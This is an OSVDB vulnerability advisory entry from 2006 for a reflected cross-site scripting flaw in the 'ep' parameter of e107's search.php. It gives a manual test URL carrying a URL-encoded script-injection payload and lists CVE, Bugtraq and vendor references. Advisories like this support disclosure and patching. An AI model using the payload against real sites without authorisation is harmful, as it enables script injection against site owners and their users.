e107 search.php ep Variable XSS

2006-06-18T11:19:00
ID OSVDB:26684
Type osvdb
Reporter OSVDB
Modified 2006-06-18T11:19:00

Description

Manual Testing Notes

http://[target]/search.php?q=&r=0&s=Search&in=1&ex=1&ep= %27%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&be=1&t=1&adv=1&type=all&on=new&time=any&author=

References:

Vendor URL: http://e107.org/ Secunia Advisory ID:20727 Related OSVDB ID: 26685 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0400.html FrSIRT Advisory: ADV-2006-2460 CVE-2006-3259 Bugtraq ID: 18560 Bugtraq ID: 18508